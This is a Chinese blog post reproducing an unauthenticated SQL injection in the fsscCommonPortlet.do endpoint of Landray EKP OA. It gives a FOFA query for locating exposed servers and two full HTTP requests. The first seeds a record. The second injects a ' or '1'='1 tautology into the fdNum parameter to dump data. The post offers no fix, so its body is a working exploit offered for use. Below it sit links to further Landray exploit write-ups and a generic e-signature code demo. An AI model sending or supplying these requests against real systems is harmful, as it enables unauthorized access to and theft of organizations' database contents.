蓝凌EKP系统fsscCommonPortlet.do存在未授权SQL注入漏洞

最新推荐文章于 2025-04-29 17:12:59 发布
最新推荐文章于 2025-04-29 17:12:59 发布
阅读量468 收藏
点赞数 2
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: sql 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/user_hs/article/details/144820856

蓝凌EKP系统fsscCommonPortlet.do存在未授权SQL注入漏洞

蓝凌EKP系统fsscCommonPortlet.do存在未授权SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息。

fofa

app="Landray-OA系统"

poc

访问save方法,填充一下数据库

POST /ekp/fssc/common/fssc_common_portlet/fsscCommonPortlet.do HTTP/1.1
Host: 
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 76

method=saveICare&fdId=&fdNum=1&docSubject=1&fdName=1&createTime=1&fdStatus=1

POST /ekp/fssc/common/fssc_common_portlet/fsscCommonPortlet.do HTTP/1.1
Host: 
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 60

method=getICareByFdId&fdNum=asdasd'+or+'1'='1&ordertype=down
OA漏洞分析与处置方案
不忘初心,护天下安全!
09-19 2993
OA sysSearchMain.do文件 存在任意文件写入漏洞,攻击者获取后台权限后可通过漏洞写入任意文件,也可以通过 custom.jsp 文件未授权写入恶意文件OAapp="Landray-OA系统"产品官网漏洞在method 为 editrParam。参数为 FdParameters,在 com.landray.kmss.sys.search.jar 中的 com.landray.kmss.sys.search.actions.SysSearchMainAction 类。
OA wechatLoginHelper.do SQL注入漏洞复现
0xSec
02-27 1944
OA wechatLoginHelper.do接口处存在SQL注入漏洞,攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
OA漏洞复现
热门推荐
混子
12-13 2万+
又是学习漏洞的一天,老是能听到OA爆发了什么,我就很蒙蔽,想问问旁边师傅,是个什么,又怕师傅来句你连都不知道,怪尴尬,索性还是靠自己把,今天复现OA
OA任意文件读取漏洞利用思路之任意用户登陆实现
最新发布
Pumpk1n_的博客
04-29 2170
本文会对OA WebService任意文件读取漏洞行复现以及在该漏洞存在的情况下可能导致的任意用户登陆。
【复现】OA SQL注入漏洞_61
fushuang333的博客
02-29 1727
【复现】OA SQL注入漏洞,​攻击者未经授权可以访问数据库中的数据,盗取用户的隐私以及个人信息,造成用户的信息泄露。
OA EKP JAVA产品开发规范 二次开发资料
oSenLin123456的博客
06-30 2530
开发人员编写程序的过程中,每个程序都会有很多不同的版本,这就需要开发人员很好的管理代码,在需要的时间可以取出需要的版本,并且每个版本都需要一个完成的说明和标记。在处理过程的每个阶段都有相关注释说明,特殊变量(结构、联合、类或对象)定义或引用时,也应写注释,有注释有便于其他开发人员或自己下次查看代码时候能很明白程序的意思,读懂程序,可以减少内部的沟通。开发人员在编程过程代码目录结构、业务逻辑在什么地方、配置文件存放位置等都需要规范,以便其他开发人员快速查找文件,减少开发过程中的沟通,减少维护成本。
EIS智慧协同平台 多处SQL注入漏洞复现
0xSec
01-12 795
​由于EIS智慧协同平台 doc_fileedit_word.aspx、frm_form_list_main.aspx、frm_button_func.aspx、fl_define_flow_chart_show.aspx等接口处未对用户输入的SQL语句进行过滤或验证导致出现SQL注入漏洞,未经身份验证的攻击者可以利用此漏洞获取数据库敏感信息。
(Landray)OA漏洞常见RCE
qq_53385700的博客
01-12 1万+
OA常见RCE的poc
漏洞复现】某OA 文件Copy导致远程代码执行
weixin_54799594的博客
07-25 3500
漏洞复现笔记
OA 文件Copy导致远程代码执行漏洞复现(XVE-2023-18344)
0xSec
07-18 2142
​由于OA代码功能模块设计缺陷问题,攻击者可以利用文件复制的方式,将后台脚本功能模块文件复制到无需权限认证的目录下,导致未经过身份认证的攻击者利用后台脚本执行模块,远程命令执行,写入后门文件并获取服务器权限。
未授权访问漏洞总结
LuckySec
03-24 5778
前言:这篇文章主要收集一些常见的未授权访问漏洞未授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。 0x01 未授权漏洞预览 Active MQ 未授权访问 Atlassian Crowd 未授权访问 CouchDB 未授权访问 Docker 未授权访问 Dubbo 未授权访问 Druid 未授权访问 Elasticsearch 未授权访问 FTP 未授权访问 Hadoop 未授权访问 JBoss 未授权访
【CVE-2024-】 EKP 远程代码执行漏洞
Lucker_YYY的博客
08-17 1105
厂商已发布补丁修复此漏洞漏洞内部编号为EKP-1216,请尽快联系厂商(https://www.landray.com.cn/)获取补丁下载更新。攻击者可通过该漏洞执行恶意代码,进而控制服务器。该漏洞利用难度低,造成危害大,建议用户尽快修复。 EKP 是由深圳市软件股份有限公司开发,是一款针对中小企业的移动化智能办公产品。使用防护类设备对相关资产进行防护,拦截请求中的恶意命令执行语句。如非必要,避免将资产暴露在互联网。是否需要绕过安全机制。
漏洞复现】 OA treexml.tmpl 远程命令执行漏洞
qq_34914659的博客
06-14 4165
漏洞复现】 OA treexml.tmpl 远程命令执行漏洞
OA存在任意文件读取漏洞
nnn2188185的博客
06-15 714
软件全称深圳市软件股份有限公司,于2001年在深圳科技园成立。是国内知名的大平台OA服务商和国内领先的知识管理解决方案提供商,是专业从事组织的知识化咨询、软件研发、实施、技术服务的国家级高新技术企业,近期Landray-OA系统被爆出存任意文件读取漏洞和后台rce
OA wechatLoginHelper存在SQL注入
qq_36334672的博客
03-07 701
是国内知名的大平台OA服务商和国内领先的知识管理解决方案提供商,是专业从事组织的知识化咨询、软件研发、实施、技术服务的国家级高新技术企业。OA存在SQL注入漏洞
OA-EKP thirdImSyncForKKWebService 任意文件读取漏洞(附脚本)
iSee857的博客
12-18 1076
OA-EKP /thirdImSyncForKKWebService接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
【杂】一些漏洞的知识(没有逻辑)----Sherlock
m0_58327783的博客
05-15 1268
首先,这只是本人在学习日志分析中发现并查阅的一些漏洞,并想要记录下来特点方便记忆,漏洞无风险排序。 1.宝塔面板未授权访问漏洞(2020.8.23起发现,已修复) 公网无需鉴权直接 root 权限进入 PhpMyAdmin 特征: 通过访问http://IP:888/pma 风险:高 存在版本: Linux正式版7.4.2 Linux测试版7.5.13 Windows正式版6.8 相关资料:宝塔面板phpMyAdmin未授权访问漏洞是个低级错误吗? - 百度文库
漏洞复现】OA wechatLoginHelper存在SQL注入漏洞
失心少年
02-29 585
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!是国内知名的大平台OA服务商和国内领先的知识管理解决方案提供商,是专业从事组织的知识化咨询、软件研发、实施、技术服务的国家级高新技术企业。OA存在SQL注入漏洞SQLMP 也可以直接跑。
EKP 签名demo
04-15
### EKP签名功能概述 EKP是一款企业级的知识管理平台,其提供了丰富的API接口支持开发者实现各种定制化需求。对于签名功能而言,通常涉及的是通过调用特定的API来完成文档或数据的安全验证以及用户身份确认的过程[^1]。 以下是关于如何在EKP中集成签名功能的一个基本示例: #### 配置环境 为了能够成功使用EKP中的签名功能,首先需要确保已经正确配置好开发环境并获取到相应的权限密钥。这一步骤可能包括但不限于下载官方SDK包、设置访问令牌等操作[^2]。 ```python import requests def get_access_token(): url = 'https://your-domain.com/api/auth/token' payload = { 'username': 'your_username', 'password': 'your_password' } response = requests.post(url, data=payload) if response.status_code == 200: token_data = response.json() return token_data['access_token'] else: raise Exception('Failed to obtain access token') ``` #### 实现电子签名请求 当完成了初步的身份认证之后,则可以进一步构建针对具体业务场景下的电子签名校验逻辑。下面给出了一段简单的Python脚本用于演示发送带有数字证书参数至服务器端进行处理的方式[^3]: ```python def create_signature(doc_id, user_id, private_key_path): headers = {'Authorization': f'Bearer {get_access_token()}'} files = {'file': open(private_key_path,'rb')} params = { 'docId': doc_id, 'userId': user_id } signature_url = 'https://your-domain.com/api/signature/create' resp = requests.post(signature_url,headers=headers,params=params,files=files) if resp.ok: result = resp.json() print(f'Signature created successfully: {result}') else: error_message = resp.text print(f'Error creating signature:{error_message}') if __name__ == '__main__': document_identifier = input("Enter Document ID:") employee_number = input("Enter User ID:") key_location = input("Path of Private Key File:") try: create_signature(document_identifier,employee_number,key_location) except Exception as e: print(e) ``` 上述代码片段展示了怎样利用RESTful API向系统提交一份待签署文件的同时附带必要的个人信息字段以便后续审核流程得以顺利开展[^4]。 --- 相关问题
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值